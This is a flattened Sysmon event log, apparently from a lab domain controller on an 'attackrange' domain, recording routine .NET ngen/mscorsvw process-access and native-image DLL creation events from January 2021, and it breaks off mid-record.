13:26:22.418{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-467E-6000-6604-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:22.418{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467E-6000-6604-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:22.308{08A6967A-467D-6000-6504-000000009A01}3340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d0c-0\System.Deployment.dll2021-01-14 13:26:22.308 11241100x80000000000000008577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:26.934{08A6967A-4682-6000-6904-000000009A01}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11dc-0\System.Device.dll2021-01-14 13:26:26.934 10341000x80000000000000008576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:26.871{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4682-6000-6904-000000009A01}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:26.856{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4682-6000-6904-000000009A01}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:26.856{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4682-6000-6904-000000009A01}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:26.809{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4682-6000-6804-000000009A01}3408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:26.793{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4682-6000-6804-000000009A01}3408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:26.793{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4682-6000-6804-000000009A01}3408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:26.481{08A6967A-467E-6000-6704-000000009A01}2152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\868-0\System.Design.dll2021-01-14 13:26:26.481 10341000x80000000000000008594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.981{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4683-6000-6E04-000000009A01}4432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.965{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4683-6000-6E04-000000009A01}4432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.965{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4683-6000-6E04-000000009A01}4432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:27.903{08A6967A-4683-6000-6D04-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1044-0\System.DirectoryServices.Protocols.dll2021-01-14 13:26:27.903 10341000x80000000000000008590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.684{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4683-6000-6D04-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.668{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4683-6000-6D04-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.668{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4683-6000-6D04-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.637{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4683-6000-6C04-000000009A01}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.621{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4683-6000-6C04-000000009A01}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.621{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4683-6000-6C04-000000009A01}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:27.543{08A6967A-4683-6000-6B04-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13c8-0\System.DirectoryServices.AccountManagement.dll2021-01-14 13:26:27.543 10341000x80000000000000008583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.152{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4683-6000-6B04-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.137{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4683-6000-6B04-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.137{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4683-6000-6B04-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:27.012{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4682-6000-6A04-000000009A01}2948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:26.996{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4682-6000-6A04-000000009A01}2948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:26.996{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4682-6000-6A04-000000009A01}2948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow6